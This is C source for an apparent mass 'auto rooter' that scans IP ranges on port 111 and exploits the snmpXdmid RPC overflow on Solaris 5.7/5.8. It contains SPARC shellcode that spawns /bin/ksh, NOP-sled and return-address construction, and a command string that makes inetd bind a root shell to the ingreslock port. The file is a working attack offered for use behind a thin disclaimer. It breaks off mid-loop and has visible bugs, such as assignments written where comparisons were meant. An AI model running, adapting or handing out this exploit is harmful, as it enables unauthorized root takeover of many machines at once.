/* [this code is for your box testing's and knowledge. other usage of this code is'nt my problem.] snmpXdmid exploit by http://lsd-pl.net/ auto rooter by tracewar. */ #include #include #include #include #include #include #include #include #include #include #include #define SNMPXDMID_PROG 100249 #define SNMPXDMID_VERS 0x1 #define SNMPXDMID_ADDCOMPONENT 0x101 #define MAX_SOCKETS 1000 #define TIMEOUT 1 #define S_NONE 0 #define S_CONNECTING 1 #define BINDA "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \ > /tmp/.x; /usr/sbin/inetd -s /tmp/.x; r\ m -f /tmp/.x;" FILE *fucker; char ipaddy[150]; int lolhaha = 0,porti = 111; char findsckcode[]= "\x20\xbf\xff\xff" /* bn,a */ "\x20\xbf\xff\xff" /* bn,a */ "\x7f\xff\xff\xff" /* call */ "\x33\x02\x12\x34" "\xa0\x10\x20\xff" /* mov 0xff,%l0 */ "\xa2\x10\x20\x54" /* mov 0x54,%l1 */ "\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */ "\xaa\x03\xe0\x28" /* add %o7,40,%l5 */ "\x81\xc5\x60\x08" /* jmp %l5+8 */ "\xc0\x2b\xe0\x04" /* stb %g0,[%o7+4] */ "\xe6\x03\xff\xd0" /* ld [%o7-48],%l3 */ "\xe8\x03\xe0\x04" /* ld [%o7+4],%l4 */ "\xa8\xa4\xc0\x14" /* subcc %l3,%l4,%l4 */ "\x02\xbf\xff\xfb" /* bz */ "\xaa\x03\xe0\x5c" /* add %o7,92,%l5 */ "\xe2\x23\xff\xc4" /* st %l1,[%o7-60] */ "\xe2\x23\xff\xc8" /* st %l1,[%o7-56] */ "\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */ "\x90\x04\x20\x01" /* add %l0,1,%o0 */ "\xa7\x2c\x60\x08" /* sll %l1,8,%l3 */ "\x92\x14\xe0\x91" /* or %l3,0x91,%o1 */ "\x94\x03\xff\xc4" /* add %o7,-60,%o2 */ "\x82\x10\x20\x36" /* mov 0x36,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "\x1a\xbf\xff\xf1" /* bcc */ "\xa0\xa4\x20\x01" /* deccc %l0 */ "\x12\xbf\xff\xf5" /* bne */ "\xa6\x10\x20\x03" /* mov 0x03,%l3 */ "\x90\x04\x20\x02" /* add %l0,2,%o0 */ "\x92\x10\x20\x09" /* mov 0x09,%o1 */ "\x94\x04\xff\xff" /* add %l3,-1,%o2 */ "\x82\x10\x20\x3e" /* mov 0x3e,%g1 */ "\xa6\x84\xff\xff" /* addcc %l3,-1,%l3 */ "\x12\xbf\xff\xfb" /* bne */ "\x91\xd0\x20\x08" /* ta 8 */ ; char shellcode[]= "\x20\xbf\xff\xff" /* bn,a */ "\x20\xbf\xff\xff" /* bn,a */ "\x7f\xff\xff\xff" /* call */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ "\x92\x02\x20\x10" /* add %o0,16,%o1 */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ "\x82\x10\x20\x0b" /* mov 0x0b,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "/bin/ksh" ; static char nop[]="\x80\x1c\x40\x11"; struct conn_t { int s; char status; time_t a; struct sockaddr_in addr; }; struct conn_t connlist[MAX_SOCKETS]; void init_sockets(void); void check_sockets(void); void cheq_ftp(char *); void fatal(char *); int main(int argc, char *argv[]) { int done, i, cip, bb, ret, k, ns; time_t scantime; char ip[20]; if (argc < 2) { printf("snmpXdmid auto rooter by TraceWar.\n"); printf("exploit code from http://lsd-pl.net/\n"); printf("Usage: %s \n",argv[0]); return -1; } done = 0; cip = 1; bb = 0; if (argc >= 4) { bb = atoi(argv[3]); if ((bb < 0) || (bb > 255)) fatal("Invalid b-range.\n"); } printf("S/R %s:%d\n",argv[1],porti); init_sockets(); scantime = time(0); while(!done) { for (i = 0; i < MAX_SOCKETS; i++) { if (cip == 255) { if ((bb == 255) || (argc >= 4)) { ns = 0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) { ns++; break; } } if (ns == 0) done = 1; break; } else { cip = 0; bb++; } } if (connlist[i].status == S_NONE) { connlist[i].s = socket(AF_INET, SOCK_STREAM, 0); if (connlist[i].s == -1) printf("Unable to allocate socket.\n"); else { ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK); if (ret == -1) { printf("Unable to set O_NONBLOCK\n"); close(connlist[i].s); } else { memset((char *)ip, 0, 20); sprintf(ip, "%s.%d.%d", argv[1], bb, cip); connlist[i].addr.sin_addr.s_addr = inet_addr(ip); if (connlist[i].addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist[i].addr.sin_family = AF_INET; connlist[i].addr.sin_port = htons(porti); connlist[i].a = time(0); connlist[i].status = S_CONNECTING; cip++; } } } } check_sockets(); } printf("Scan completed (%u).\n", (time(0) - scantime)); } void init_sockets(void) { int i; for (i = 0; i < MAX_SOCKETS; i++) { connlist[i].status = S_NONE; memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in)); } } void check_sockets(void) { int i, ret; for (i = 0; i < MAX_SOCKETS; i++) { if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING)) { close(connlist[i].s); connlist[i].status = S_NONE; } else if (connlist[i].status == S_CONNECTING) { ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr, sizeof(struct sockaddr_in)); if (ret == -1) { if (errno == EISCONN) { cheq_ftp((char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } if ((errno != EALREADY) && (errno != EINPROGRESS)) { close(connlist[i].s); connlist[i].status = S_NONE; } } else { cheq_ftp((char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } } } } void fatal(char *err) { int i; printf("Error: %s\n", err); for (i = 0; i < MAX_SOCKETS; i++) { if (connlist[i].status >= S_CONNECTING) close(connlist[i].s); } exit(-1); } void cheq_ftp(char *h) { sprintf(ipaddy,"%s",h); printf("trying to own %s...\n",h); lolhaha = 1; /* 1 = it will hack sunos 5.7, 2 = it will hack sunos 5.8. */ lol(); } typedef struct{ struct{unsigned int len;char *val;}name; struct{unsigned int len;char *val;}pragma; }req_t; bool_t xdr_req(XDR *xdrs,req_t *objp){ char *v=NULL;unsigned long l=0;int b=1; if(!xdr_u_long(xdrs,&l)) return(FALSE); if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE); if(!xdr_bool(xdrs,&b)) return(FALSE); if(!xdr_u_long(xdrs,&l)) return(FALSE); if(!xdr_bool(xdrs,&b)) return(FALSE); if(!xdr_array(xdrs,&objp->name.val,&objp->name.len,~0,sizeof(char), (xdrproc_t)xdr_char)) return(FALSE); if(!xdr_bool(xdrs,&b)) return(FALSE); if(!xdr_array(xdrs,&objp->pragma.val,&objp->pragma.len,~0,sizeof(char), (xdrproc_t)xdr_char)) return(FALSE); if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE); if(!xdr_u_long(xdrs,&l)) return(FALSE); return(TRUE); } lol(){ char buffer[140000],address[4],pch[4],*b; int i,c,n,vers=-1,port=0,sck; CLIENT *cl;enum clnt_stat stat; struct hostent *hp; struct sockaddr_in adr; struct timeval tm={10,0}; req_t req; if(lolhaha = 1){ vers=7; } if(lolhaha = 2){ vers=8; } switch(vers){ case 7: *(unsigned int*)address=0x000b1868;break; case 8: *(unsigned int*)address=0x000cf2c0;break; default: exit(-1); } *(unsigned long*)pch=htonl(*(unsigned int*)address+32000); *(unsigned long*)address=htonl(*(unsigned int*)address+64000+32000); fflush(stdout); adr.sin_family=AF_INET; adr.sin_port=htons(port); if((adr.sin_addr.s_addr=inet_addr(ipaddy))==-1){ if((hp=gethostbyname(ipaddy))==NULL){ errno=EADDRNOTAVAIL;perror("error");exit(-1); } memcpy(&adr.sin_addr.s_addr,hp->h_addr,4); } sck=RPC_ANYSOCK; if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){ clnt_pcreateerror("error"); return(1); } cl->cl_auth=authunix_create("localhost",0,0,0,NULL); i=sizeof(struct sockaddr_in); if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){ struct{unsigned int maxlen;unsigned int len;char *buf;}nb; ioctl(sck,(('S'<<8)|2),"sockmod"); nb.maxlen=0xffff; nb.len=sizeof(struct sockaddr_in);; nb.buf=(char*)&adr; ioctl(sck,(('T'<<8)|144),&nb); } n=ntohs(adr.sin_port); fflush(stdout); findsckcode[12+2]=(unsigned char)((n&0xff00)>>8); findsckcode[12+3]=(unsigned char)(n&0xff); b=&buffer[0]; for(i=0;i<1248;i++) *b++=pch[i%4]; for(i=0;i<352;i++) *b++=address[i%4]; *b=0; b=&buffer[10000]; for(i=0;i<64000;i++) *b++=0; for(i=0;i<64000-188;i++) *b++=nop[i%4]; for(i=0;i